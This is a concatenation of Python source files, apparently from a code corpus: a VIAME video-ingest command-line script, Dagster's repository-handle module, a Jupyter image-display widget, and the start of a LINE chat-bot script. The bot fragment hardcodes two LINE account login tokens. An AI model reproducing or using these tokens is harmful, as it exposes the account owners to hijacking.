parser.add_argument("-fbatch", dest="batch_size", default="",
help="Optional number of frames to process in batches")
parser.add_argument("-fskip", dest="batch_skip", default="",
help="If batching frames, number of frames to skip between batches")
parser.add_argument("-ifrate", dest="input_frame_rate", default="",
help="Input frame rate over-ride to process videos at. This is useful "
"for specifying the frame rate of input image lists, which typically "
"don't have frame rates")
parser.add_argument("-detection-threshold", dest="detection_threshold", default="",
help="Optional detection threshold over-ride parameter")
parser.add_argument("-tracker-threshold", dest="tracker_threshold", default="",
help="Optional tracking threshold over-ride parameter")
parser.add_argument("-archive-height", dest="archive_height", default="",
help="Advanced: Optional video archive height over-ride")
parser.add_argument("-archive-width", dest="archive_width", default="",
help="Advanced: Optional video archive width over-ride")
parser.add_argument("-gpus", "--gpu-count", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("-pipes-per-gpu", "--pipes", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("--detection-plots", dest="detection_plots", action="store_true",
help="Produce per-video detection plot summaries")
parser.add_argument("--track-plots", dest="track_plots", action="store_true",
help="Produce per-video track plot summaries")
parser.add_argument("-plot-objects", dest="objects", default="fish",
help="Objects to generate plots for")
parser.add_argument("-plot-threshold", dest="plot_threshold", default=0.25, type=float,
help="Threshold to generate plots for")
parser.add_argument("-plot-smooth", dest="smooth", default=1, type=int,
help="Smoothing factor for plots")
parser.add_argument("-auto-detect-gt", dest="auto_detect_gt", default="",
help="Automatically pass to pipes GT of this type if present")
parser.add_argument("--init-db", dest="init_db", action="store_true",
help="Re-initialize database")
parser.add_argument("--build-index", dest="build_index", action="store_true",
help="Build searchable index on completion")
parser.add_argument("--ball-tree", dest="ball_tree", action="store_true",
help="Use a ball tree for the searchable index")
parser.add_argument("--no-reset-prompt", dest="no_reset_prompt", action="store_true",
help="Don't prompt if the output folder should be reset")
parser.add_argument("--ts-from-file", dest="ts_from_file", action="store_true",
help="Attempt to retrieve timestamps from image filenames.")
parser.add_argument("--write-svm-info", dest="write_svm_info", action="store_true",
help="Write out header information used for training SVMs")
parser.add_argument("--debug", dest="debug", action="store_true",
help="Run with debugger attached to process")
parser.add_argument("-install", dest="install_dir", default="",
help="Optional install dir over-ride for all application "
"binaries. If this is not specified, it is expected that all "
"viame binaries are already in our path.")
args = parser.parse_args()
# Assorted error checking up front
process_data = True
number_input_args = sum(len(inp_x) > 0 for inp_x in [args.input_video, args.input_dir, args.input_list])
if number_input_args == 0 or args.pipeline == no_pipeline:
if not args.build_index and not args.detection_plots and not args.track_plots:
exit_with_error( "Either input video or input directory must be specified" )
else:
process_data = False
elif number_input_args > 1:
exit_with_error( "Only one of input video, directory, or list should be specified, not more" )
if ( args.detection_plots or args.track_plots ) and len( args.frame_rate ) == 0:
exit_with_error( "Must specify frame rate if generating detection or track plots" )
signal.signal( signal.SIGINT, signal_handler )
# Initialize database
if args.init_db:
if len( args.log_directory ) > 0:
init_log_file = args.output_directory + div + args.log_directory + div + "database_log.txt"
else:
init_log_file = ""
db_is_init, user_select = database_tool.init( log_file=init_log_file, prompt=(not args.no_reset_prompt) )
if not db_is_init:
if user_select:
log_info( "User decided to not initialize new database, shutting down." + lb2 )
sys.exit( 0 )
elif len( args.log_directory ) > 0:
exit_with_error( "Unable to initialize database, check " + init_log_file + lb2 +
"You may have another database running on your system, or ran "
"a failed operation in the past and need to re-log or restart." )
else:
exit_with_error( "Unable to initialize database" )
log_info( lb1 )
# Call processing pipelines on all input data
if process_data:
# Handle output directory creation if necessary
if len( args.output_directory ) > 0:
recreate_dir = ( not args.init_db and not args.no_reset_prompt )
prompt_user = ( not args.no_reset_prompt )
create_dir( args.output_directory, logging=False, recreate=recreate_dir, prompt=prompt_user )
if len( args.log_directory ) > 0:
create_dir( args.output_directory + div + args.log_directory, logging=False )
# Identify all videos to process
if len( args.input_list ) > 0:
if args.gpu_count > 1:
video_list = split_image_list( args.input_list, args.gpu_count, args.output_directory )
else:
video_list = [ args.input_list ]
is_image_list = True
elif len( args.input_dir ) > 0:
video_list = list_videos_in_dir( args.input_dir, args.video_exts )
is_image_list = False
else:
video_list = [ args.input_video ]
is_image_list = False
if len( video_list ) == 0:
exit_with_error( "No videos found for ingest in given folder, exiting." )
elif not is_image_list:
if not args.init_db:
log_info( lb1 )
video_str = " video" if len( video_list ) == 1 else " videos"
log_info( "Processing " + str( len( video_list ) ) + video_str + lb2 )
elif not args.build_index:
log_info( lb1 )
# Check for local pipelines and pre-reqs present
if "_local.pipe" in args.pipeline:
if not os.path.exists( "category_models/detector.pipe" ):
if has_file_with_extension( "category_models", "svm" ):
if args.pipeline.endswith( "detector_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "detector_svm_models.pipe" )
elif args.pipeline.endswith( "full_frame_classifier_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "full_frame_classifier_svm.pipe" )
elif args.pipeline.endswith( "tracker_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "tracker_svm_models.pipe" )
else:
exit_with_error( "Use of this script requires training a detector first" )
else:
exit_with_error( "Use of this script requires training a detector first" )
# Process videos in parallel, one per GPU
video_queue = queue.Queue()
for video_name in video_list:
if os.path.isfile( video_name ) or os.path.isdir( video_name ):
video_queue.put( video_name )
else:
log_info( "Skipping unknown input: " + video_name + lb )
def process_video_thread( gpu, cpu ):
while True:
try:
video_name = video_queue.get_nowait()
except queue.Empty:
break
process_video_kwiver( video_name, args, is_image_list,
cpu=cpu, gpu=gpu, write_track_time=not is_image_list )
gpu_thread_list = [ i for i in range( args.gpu_count ) for _ in range( args.pipes ) ]
cpu_thread_list = list( range( args.pipes ) ) * args.gpu_count
threads = [ threading.Thread( target = process_video_thread, args = (gpu,cpu,) )
for gpu, cpu in zip( gpu_thread_list, cpu_thread_list ) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if is_image_list:
if args.gpu_count > 1: # Each thread outputs 1 list, add multiple
add_final_list_csv( args, video_list )
for image_list in video_list: # Clean up after split_image_list
os.unlink( image_list )
if not video_queue.empty():
exit_with_error( "Some videos were not processed!" )
# Build out detection vs time plots for both detections and tracks
if args.detection_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for detections" )
detection_plot_dir = os.path.join( args.output_directory, "detection_plots" )
create_dir( detection_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
detection_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = detection_ext, top_category_only = False )
if args.track_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for tracks" )
track_plot_dir = os.path.join( args.output_directory, "track_plots" )
create_dir( track_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
track_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = track_ext, top_category_only = True )
if args.detection_plots or args.track_plots:
log_info( lb1 )
# Build searchable index
if args.build_index:
log_info( lb1 + "Building searchable index" + lb2 )
if len( args.log_directory ) > 0 and args.log_directory != "PIPE":
index_log_file = args.output_directory + div + args.log_directory + div + "smqtk_indexer.txt"
else:
index_log_file = ""
if args.ball_tree:
print( "Warning: building a ball tree is deprecated" )
if not database_tool.build_standard_index( remove_quotes( args.install_dir ),
log_file = index_log_file ):
exit_with_error( "Unable to build index" )
# Output complete message
if os.name == 'nt':
log_info( lb1 + "Processing complete, close this window before launching any GUI." + lb2 )
else:
log_info( lb1 + "Processing complete" + lb2 )
|
handle.py
|
import sys
import threading
from abc import ABCMeta, abstractmethod
from collections import namedtuple
from enum import Enum
import six
from dagster import check
from dagster.api.list_repositories import sync_list_repositories, sync_list_repositories_grpc
from dagster.core.code_pointer import CodePointer
from dagster.core.errors import DagsterInvariantViolationError
from dagster.core.host_representation.selector import PipelineSelector
from dagster.core.origin import RepositoryGrpcServerOrigin, RepositoryPythonOrigin
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
# This is a hard-coded name for the special "in-process" location.
# This is typically only used for tests, although we may allow
# users to load user code into a host process as well. We want
# to encourage the user code to be in user processes as much
# as possible since that is how this system will be used in prod.
# We use a hard-coded name so that we don't have to create
# made-up names for this case.
IN_PROCESS_NAME = "<<in_process>>"
def _assign_grpc_location_name(port, socket, host):
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.str_param(host, "host")
check.invariant(port or socket)
return "grpc:{host}:{socket_or_port}".format(
host=host, socket_or_port=(socket if socket else port)
)
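# e.g. _assign_grpc_location_name(4000, None, "localhost") -> "grpc:localhost:4000"
# and  _assign_grpc_location_name(None, "/tmp/server.sock", "localhost") -> "grpc:localhost:/tmp/server.sock"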
def _assign_python_env_location_name(repository_code_pointer_dict):
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
)
if len(repository_code_pointer_dict) > 1:
raise DagsterInvariantViolationError(
"If there is one than more repository you must provide a location name"
)
return next(iter(repository_code_pointer_dict.keys()))
# Which API the host process should use to communicate with the process
# containing user code
class UserProcessApi(Enum):
# Execute via the command-line API
CLI = "CLI"
# Connect via gRPC
GRPC = "GRPC"
class RepositoryLocationHandle(six.with_metaclass(ABCMeta)):
@abstractmethod
def create_reloaded_handle(self):
pass
def cleanup(self):
pass
@staticmethod
def create_in_process_location(pointer):
check.inst_param(pointer, "pointer", CodePointer)
# If we are here we know we are in a hosted_user_process so we can do this
from dagster.core.definitions.reconstructable import repository_def_from_pointer
repo_def = repository_def_from_pointer(pointer)
return InProcessRepositoryLocationHandle(IN_PROCESS_NAME, {repo_def.name: pointer})
@staticmethod
def create_python_env_location(
loadable_target_origin,
location_name,
user_process_api=UserProcessApi.CLI,
use_python_package=False,
):
check.inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_str_param(location_name, "location_name")
check.bool_param(use_python_package, "use_python_package")
if user_process_api == UserProcessApi.GRPC:
return RepositoryLocationHandle.create_process_bound_grpc_server_location(
loadable_target_origin=loadable_target_origin, location_name=location_name
)
response = sync_list_repositories(
executable_path=loadable_target_origin.executable_path,
python_file=loadable_target_origin.python_file,
module_name=loadable_target_origin.module_name,
working_directory=loadable_target_origin.working_directory,
attribute=loadable_target_origin.attribute,
)
if loadable_target_origin.python_file:
repository_code_pointer_dict = {
lrs.repository_name: CodePointer.from_python_file(
loadable_target_origin.python_file,
lrs.attribute,
loadable_target_origin.working_directory,
)
for lrs in response.repository_symbols
}
elif use_python_package:
repository_code_pointer_dict = {
lrs.repository_name: CodePointer.from_python_package(
loadable_target_origin.module_name, lrs.attribute
)
for lrs in response.repository_symbols
}
else:
repository_code_pointer_dict = {
lrs.repository_name: CodePointer.from_module(
loadable_target_origin.module_name, lrs.attribute
)
for lrs in response.repository_symbols
}
return PythonEnvRepositoryLocationHandle(
location_name=location_name
if location_name
else _assign_python_env_location_name(repository_code_pointer_dict),
loadable_target_origin=loadable_target_origin,
repository_code_pointer_dict=repository_code_pointer_dict,
)
@staticmethod
def create_process_bound_grpc_server_location(loadable_target_origin, location_name):
from dagster.grpc.client import client_heartbeat_thread
from dagster.grpc.server import GrpcServerProcess
server = GrpcServerProcess(
loadable_target_origin=loadable_target_origin, max_workers=2, heartbeat=True
)
client = server.create_ephemeral_client()
heartbeat_shutdown_event = threading.Event()
heartbeat_thread = threading.Thread(
target=client_heartbeat_thread, args=(client, heartbeat_shutdown_event)
)
heartbeat_thread.daemon = True
heartbeat_thread.start()
list_repositories_response = sync_list_repositories_grpc(client)
code_pointer_dict = list_repositories_response.repository_code_pointer_dict
return ManagedGrpcPythonEnvRepositoryLocationHandle(
loadable_target_origin=loadable_target_origin,
executable_path=list_repositories_response.executable_path,
location_name=location_name
if location_name
else _assign_python_env_location_name(code_pointer_dict),
repository_code_pointer_dict=code_pointer_dict,
client=client,
grpc_server_process=server,
heartbeat_thread=heartbeat_thread,
heartbeat_shutdown_event=heartbeat_shutdown_event,
)
@staticmethod
def create_grpc_server_location(port, socket, host, location_name=None):
from dagster.grpc.client import DagsterGrpcClient
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.str_param(host, "host")
check.opt_str_param(location_name, "location_name")
client = DagsterGrpcClient(port=port, socket=socket, host=host)
list_repositories_response = sync_list_repositories_grpc(client)
repository_names = set(
symbol.repository_name for symbol in list_repositories_response.repository_symbols
)
return GrpcServerRepositoryLocationHandle(
port=port,
socket=socket,
host=host,
location_name=location_name
if location_name
else _assign_grpc_location_name(port, socket, host),
client=client,
repository_names=repository_names,
)
class GrpcServerRepositoryLocationHandle(
namedtuple(
"_GrpcServerRepositoryLocationHandle",
"port socket host location_name client repository_names",
),
RepositoryLocationHandle,
):
"""
Represents a gRPC server that Dagster is not responsible for managing.
"""
def __new__(cls, port, socket, host, location_name, client, repository_names):
from dagster.grpc.client import DagsterGrpcClient
return super(GrpcServerRepositoryLocationHandle, cls).__new__(
cls,
check.opt_int_param(port, "port"),
check.opt_str_param(socket, "socket"),
check.str_param(host, "host"),
check.str_param(location_name, "location_name"),
check.inst_param(client, "client", DagsterGrpcClient),
check.set_param(repository_names, "repository_names", of_type=str),
)
def create_reloaded_handle(self):
return RepositoryLocationHandle.create_grpc_server_location(
self.port, self.socket, self.host, self.location_name
)
def get_current_image(self):
job_image = self.client.get_current_image().current_image
if not job_image:
raise DagsterInvariantViolationError(
"Unable to get current image that GRPC server is running. Please make sure that "
"env var DAGSTER_CURRENT_IMAGE is set in the GRPC server and contains the most "
"up-to-date user code image and tag. Exiting."
)
return job_image
def get_repository_python_origin(self, repository_name):
check.str_param(repository_name, "repository_name")
list_repositories_reply = self.client.list_repositories()
repository_code_pointer_dict = list_repositories_reply.repository_code_pointer_dict
if repository_name not in repository_code_pointer_dict:
raise DagsterInvariantViolationError(
"Unable to find repository name {} on GRPC server.".format(repository_name)
)
code_pointer = repository_code_pointer_dict[repository_name]
return RepositoryPythonOrigin(
executable_path=list_repositories_reply.executable_path or sys.executable,
code_pointer=code_pointer,
)
class PythonEnvRepositoryLocationHandle(
namedtuple(
"_PythonEnvRepositoryLocationHandle",
"loadable_target_origin location_name repository_code_pointer_dict",
),
RepositoryLocationHandle,
):
def __new__(cls, loadable_target_origin, location_name, repository_code_pointer_dict):
return super(PythonEnvRepositoryLocationHandle, cls).__new__(
cls,
check.inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
),
check.str_param(location_name, "location_name"),
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
),
)
@property
def executable_path(self):
return self.loadable_target_origin.executable_path
def create_reloaded_handle(self):
return RepositoryLocationHandle.create_python_env_location(
self.loadable_target_origin, self.location_name,
)
class ManagedGrpcPythonEnvRepositoryLocationHandle(
namedtuple(
"_ManagedGrpcPythonEnvRepositoryLocationHandle",
"loadable_target_origin executable_path location_name repository_code_pointer_dict "
"grpc_server_process client heartbeat_thread heartbeat_shutdown_event",
),
RepositoryLocationHandle,
):
"""
A Python environment for which Dagster is managing a gRPC server.
"""
def __new__(
cls,
loadable_target_origin,
executable_path,
location_name,
repository_code_pointer_dict,
grpc_server_process,
client,
heartbeat_thread,
heartbeat_shutdown_event,
):
from dagster.grpc.client import DagsterGrpcClient
from dagster.grpc.server import GrpcServerProcess
return super(ManagedGrpcPythonEnvRepositoryLocationHandle, cls).__new__(
cls,
check.inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
),
check.str_param(executable_path, "executable_path"),
check.str_param(location_name, "location_name"),
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
),
check.inst_param(grpc_server_process, "grpc_server_process", GrpcServerProcess),
check.inst_param(client, "client", DagsterGrpcClient),
check.inst_param(heartbeat_thread, "heartbeat_thread", threading.Thread),
heartbeat_shutdown_event,
)
@property
def repository_names(self):
return set(self.repository_code_pointer_dict.keys())
@property
def host(self):
return "localhost"
@property
def port(self):
return self.grpc_server_process.port
@property
def socket(self):
return self.grpc_server_process.socket
def create_reloaded_handle(self):
return RepositoryLocationHandle.create_process_bound_grpc_server_location(
self.loadable_target_origin, self.location_name,
)
def cleanup(self):
self.heartbeat_shutdown_event.set()
self.heartbeat_thread.join()
self.client.cleanup_server()
class InProcessRepositoryLocationHandle(
namedtuple("_InProcessRepositoryLocationHandle", "location_name repository_code_pointer_dict"),
RepositoryLocationHandle,
):
def __new__(cls, location_name, repository_code_pointer_dict):
return super(InProcessRepositoryLocationHandle, cls).__new__(
cls,
check.str_param(location_name, "location_name"),
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
),
)
def create_reloaded_handle(self):
raise NotImplementedError("Not implemented for in-process")
class RepositoryHandle(
namedtuple("_RepositoryHandle", "repository_name repository_location_handle")
):
def __new__(cls, repository_name, repository_location_handle):
return super(RepositoryHandle, cls).__new__(
cls,
check.str_param(repository_name, "repository_name"),
check.inst_param(
repository_location_handle, "repository_location_handle", RepositoryLocationHandle
),
)
def get_origin(self):
if isinstance(self.repository_location_handle, InProcessRepositoryLocationHandle):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=sys.executable,
)
elif isinstance(
self.repository_location_handle, PythonEnvRepositoryLocationHandle
) or isinstance(
self.repository_location_handle, ManagedGrpcPythonEnvRepositoryLocationHandle
):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=self.repository_location_handle.executable_path,
)
elif isinstance(self.repository_location_handle, GrpcServerRepositoryLocationHandle):
return RepositoryGrpcServerOrigin(
host=self.repository_location_handle.host,
port=self.repository_location_handle.port,
socket=self.repository_location_handle.socket,
repository_name=self.repository_name,
)
else:
check.failed(
"Can not target represented RepositoryDefinition locally for repository from a {}.".format(
self.repository_location_handle.__class__.__name__
)
)
class PipelineHandle(namedtuple("_PipelineHandle", "pipeline_name repository_handle")):
def __new__(cls, pipeline_name, repository_handle):
return super(PipelineHandle, cls).__new__(
cls,
check.str_param(pipeline_name, "pipeline_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
def to_string(self):
return "{self.location_name}.{self.repository_name}.{self.pipeline_name}".format(self=self)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_pipeline_origin(self.pipeline_name)
def to_selector(self):
return PipelineSelector(self.location_name, self.repository_name, self.pipeline_name, None)
class ScheduleHandle(namedtuple("_ScheduleHandle", "schedule_name repository_handle")):
def __new__(cls, schedule_name, repository_handle):
return super(ScheduleHandle, cls).__new__(
cls,
check.str_param(schedule_name, "schedule_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_schedule_origin(self.schedule_name)
class PartitionSetHandle(namedtuple("_PartitionSetHandle", "partition_set_name repository_handle")):
def __new__(cls, partition_set_name, repository_handle):
return super(PartitionSetHandle, cls).__new__(
cls,
check.str_param(partition_set_name, "partition_set_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
|
DisplayPane.py
|
import bqplot as bq
import ipywidgets as ipy
import cv2
import numpy as np
from threading import Thread
from VisionSystem.DetectionModel import Frame, ColorSpaces
from .Interactor.ResultDisplayer import ResultDisplayer
from .Interactor.DataSetBrowser import DataSetBrowser
from .Interactor.FrameLabeller import FrameLabeller
class DisplayPane(ipy.VBox):
FULL_EXTERNAL_WIDTH = 983
FULL_INTERNAL_WIDTH = 745
FULL_OFFSET = 240
def __init__(self, video_stream=None, img_path=None, img=None, interactors=None, size=0.5, vision_system=None, frame=None,
filter_fn=None, apply_filter_to_vision_system_input=False, update_frame_cbs=None, display_colorspace=ColorSpaces.BGR,
available_space=1, apply_mask=False, dataset=None, **kwargs):
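# Exactly one image source (video_stream, img_path, img, frame or dataset) is
# expected. Note that the chained XOR below only rejects an even number of
# sources; passing three at once would slip through unnoticed.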
if not (video_stream is not None) ^ (img is not None) ^ (frame is not None) ^ (img_path is not None) ^ (dataset is not None):
raise Exception(
"exactly one of video_stream, img_path, img, frame or dataset must be provided")
self.bq_img = None
self.raw_frame = None
self.size = size
self.available_space = available_space
self.video_stream = video_stream
self.dataset = dataset
self.togglebutton_group = []
self.interactors = interactors or []
self.vision_system = vision_system
self.filter_fn = filter_fn
self.apply_filter_to_vision_system_input = apply_filter_to_vision_system_input
self.image_plot_scales = {'x': bq.LinearScale(), 'y': bq.LinearScale()}
self.hidden = False
self.display_colorspace = display_colorspace
self.apply_mask = apply_mask
self.dataset_idx = 0
self.update_frame_cbs = update_frame_cbs or []
# read the data from a file to display
if img is None:
if dataset is not None:
bgr, _ = next(iter(dataset))
self.raw_frame = Frame(bgr, ColorSpaces.BGR)
elif frame is not None and isinstance(frame, Frame):
self.raw_frame = frame
elif img_path is not None:
bgr = cv2.imread(img_path)
if bgr is None:
raise Exception("Failed to read image at img_path")
self.raw_frame = Frame(bgr, ColorSpaces.BGR)
else:
self.raw_frame = next(iter(self.video_stream))
else:
self.raw_frame = Frame(img, ColorSpaces.BGR)
self.filtered_frame = Frame.copy_of(self.raw_frame)
self.labelled_frame = Frame.copy_of(self.filtered_frame)
self.update_data_and_display()
if self.dataset is not None:
self.interactors.insert(0, DataSetBrowser(self.dataset))
if not any(isinstance(inter, FrameLabeller) for inter in self.interactors):
self.interactors.append(FrameLabeller(self.dataset.labels))
if self.vision_system is not None:
self.interactors.append(ResultDisplayer(self.vision_system))
# link all required interactors
for interactor in self.interactors:
interactor.link_with(self)
self.image_plot = self.make_image_plot()
interactors_with_controls = [
interactor for interactor in self.interactors if interactor.ipy_controls is not None]
panel_controls = [
interactor.ipy_controls for interactor in interactors_with_controls if interactor.is_panel]
toolbar_controls = [
interactor.ipy_controls for interactor in interactors_with_controls if not interactor.is_panel]
display_pane = ipy.VBox([
self.image_plot,
self.make_image_tools(self.image_plot)
] + toolbar_controls)
display_pane.layout.width = str(
size * available_space * self.FULL_EXTERNAL_WIDTH) + 'px'
# fill across 1/size panes horizontally before filling downwards
hbox_list = [display_pane]
vbox_list = []
for controls in (c for c in panel_controls if c is not None):
hbox_list.append(controls)
if len(hbox_list) == int(1 / size):
vbox_list.append(ipy.HBox(hbox_list))
hbox_list = []
# add the remainder
vbox_list += hbox_list
super().__init__(vbox_list, **kwargs)
def make_image_plot(self):
marks = [self.bq_img]
for interactor in self.interactors:
marks += interactor.image_plot_marks
image_plot = bq.Figure(
marks=marks,
padding_y=0
)
height, width, _ = self.raw_frame.get(ColorSpaces.BGR).shape
# make sure the image is displayed with the correct aspect ratio
# TODO: is this broken?
image_plot.layout.width = '100%'
image_plot.layout.margin = '0'
image_plot.layout.height = str(
(self.FULL_INTERNAL_WIDTH * height / width + self.FULL_OFFSET) * self.size * self.available_space) + 'px'
return image_plot
def make_image_tools(self, image_plot):
widget_list = [
self.make_toggle_panzoom_button(image_plot),
self.make_reset_zoom_button(),
self.make_toggle_apply_mask_button()
]
if self.video_stream is not None:
if self.video_stream.on_disk:
widget_list.append(self.make_video_controller())
else:
# start the livestream pipe to this displaypane on a separate thread
Thread(target=self.pipe_livestream).start()
if self.dataset is not None:
if self.dataset.type_str in ["img-dir", "vid"]:
widget_list.append(self.make_dataset_frame_browser())
return ipy.HBox(widget_list)
def pipe_livestream(self):
for frame in self.video_stream:
self.raw_frame = frame
self.update_data_and_display()
def make_toggle_apply_mask_button(self):
button = ipy.ToggleButton(
value=False,
tooltip='Toggle Mask',
icon='eye-slash'
)
button.layout.width = '60px'
def on_toggle(change):
self.apply_mask = not self.apply_mask
self.update_data_and_display()
button.observe(on_toggle, 'value')
return button
def make_toggle_panzoom_button(self, image_plot):
self.image_plot_panzoom = bq.interacts.PanZoom(
scales={'x': [self.image_plot_scales['x']],
'y': [self.image_plot_scales['y']]},
)
button = ipy.ToggleButton(
value=False,
tooltip='Toggle Pan / Zoom',
icon='arrows'
)
button.layout.width = '60px'
def on_toggle(change):
if change['new']:
image_plot.interaction = self.image_plot_panzoom
else:
image_plot.interaction = None
button.observe(on_toggle, 'value')
self.add_to_togglebutton_group(button)
return button
def make_reset_zoom_button(self):
button = ipy.Button(
disabled=False,
tooltip='Reset zoom',
icon='refresh'
)
button.layout.width = '60px'
def on_click(_change):
self.image_plot_panzoom.scales['x'][0].min = None
self.image_plot_panzoom.scales['x'][0].max = None
self.image_plot_panzoom.scales['y'][0].min = None
self.image_plot_panzoom.scales['y'][0].max = None
button.on_click(on_click)
return button
def make_dataset_frame_browser(self):
if self.dataset.type_str == "vid":
cap = cv2.VideoCapture(self.dataset.filepath)
fps = cap.get(cv2.CAP_PROP_FPS)
if self.dataset.type_str == "img-dir":
fps = 2
last_frame = len(self.dataset) - 1
player = ipy.Play(
interval=1000 / fps,
max=last_frame
)
slider = ipy.IntSlider(max=last_frame,
continuous_update=False)
ipy.link((player, 'value'), (slider, 'value'))
def on_framechange(change):
self.dataset_idx = change['new']
self.raw_frame = self.dataset.read_frame(self.dataset_idx)
self.update_data_and_display()
player.observe(on_framechange, 'value')
slider.observe(on_framechange, 'value')
def change_slider(amount):
def cb(_change):
slider.value += amount
if slider.value > last_frame:
slider.value = last_frame
elif slider.value < 0:
slider.value = 0
return cb
prev_frame_button = ipy.Button(
icon='step-backward',
tooltip='Previous Frame'
)
prev_frame_button.layout.width = '60px'
prev_frame_button.on_click(change_slider(-1))
next_frame_button = ipy.Button(
icon='step-forward',
tooltip='Next Frame'
)
next_frame_button.layout.width = '60px'
next_frame_button.on_click(change_slider(+1))
controller = ipy.HBox(
[prev_frame_button, player, next_frame_button, slider])
return controller
def make_video_controller(self):
last_frame = self.video_stream.cap.get(cv2.CAP_PROP_FRAME_COUNT) - 1
player = ipy.Play(
interval=1000 / self.video_stream.cap.get(cv2.CAP_PROP_FPS),
max=last_frame
)
slider = ipy.IntSlider(max=last_frame)
ipy.link((player, 'value'), (slider, 'value'))
def on_framechange(change):
frame_idx = change['new']
self.raw_frame = self.video_stream.read_frame(frame_idx)
self.update_data_and_display()
player.observe(on_framechange, 'value')
slider.observe(on_framechange, 'value')
def change_slider(amount):
def cb(_change):
slider.value += amount
if slider.value > last_frame:
slider.value = last_frame
elif slider.value < 0:
slider.value = 0
return cb
prev_frame_button = ipy.Button(
icon='step-backward',
tooltip='Previous Frame'
)
prev_frame_button.layout.width = '60px'
prev_frame_button.on_click(change_slider(-1))
next_frame_button = ipy.Button(
icon='step-forward',
tooltip='Next Frame'
)
next_frame_button.layout.width = '60px'
next_frame_button.on_click(change_slider(+1))
controller = ipy.HBox(
[prev_frame_button, player, next_frame_button, slider])
return controller
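# update_data_and_display() pushes raw_frame through filter_fn (if any),
# copies the result into labelled_frame, lets the vision system annotate it,
# then re-encodes the image as a JPEG for the bqplot image mark.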
def update_data_and_display(self):
if not self.hidden:
# filter the image if need be
self.filtered_frame.link(self.raw_frame, ColorSpaces.BGR)
if self.filter_fn is not None:
self.filtered_frame.copy(self.filter_fn(
self.filtered_frame), ColorSpaces.BGR)
self.labelled_frame.copy(self.filtered_frame, ColorSpaces.BGR)
if self.vision_system is not None:
self.vision_system.update_with_frame(self.labelled_frame)
for cb in self.update_frame_cbs:
cb()
bgr_img = self.labelled_frame.get(self.display_colorspace)
# apply the mask here for view purposes
if self.apply_mask and self.labelled_frame.mask is not None:
bgr_img = cv2.bitwise_and(
bgr_img, bgr_img, mask=self.labelled_frame.mask)
ipy_img = ipy.Image(value=cv2.imencode('.jpg', bgr_img)[
1].tobytes(), format='jpg')
if self.bq_img is None:
self.bq_img = bq.Image(
image=ipy_img, scales=self.image_plot_scales)
else:
self.bq_img.image = ipy_img
def link_frame(self, master_pane):
def on_update_frame():
self.raw_frame = master_pane.raw_frame
self.update_data_and_display()
master_pane.update_frame_cbs.append(on_update_frame)
def add_interactor(self, display_pane_interactor):
display_pane_interactor.link_with(self)
self.interactors.append(display_pane_interactor)
def set_interaction(self, interaction):
self.image_plot.interaction = interaction
def clear_interaction(self):
self.image_plot.interaction = None
def add_to_togglebutton_group(self, togglebutton):
self.togglebutton_group.append(togglebutton)
def on_toggle(change):
if change['new'] is True:
for button in self.togglebutton_group:
if button is not togglebutton:
button.value = False
togglebutton.observe(on_toggle, 'value')
def show(self):
self.hidden = False
self.update_data_and_display()
def hide(self):
self.hidden = True
|
10bot.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE() #Luffy
#cl.login(qr=True)
cl.login(token="EnlRYqL4DlWKIr9dfIU2.WUI0jVzzeewupQ5tboz8mG.K5G366kQX+YWWdGRGXAwMU2rHcF2hhu0Lm3JmSNUPKI=")
cl.loginResult()
ki = LINETCR.LINE() #Zorro
#ki.login(qr=True)
ki.login(token="Ennz3JizkJJFMKAIPHV2.ZNOnP4uou95euS+Ku1ce4G.V/kc9Cm3euyvm7F3MLq7WLvFzmSoTIJKK3Nohopw9zQ=")
ki.loginResult()
#kk = LINETCR.LINE() #Sanji
#kk.login(qr=True)
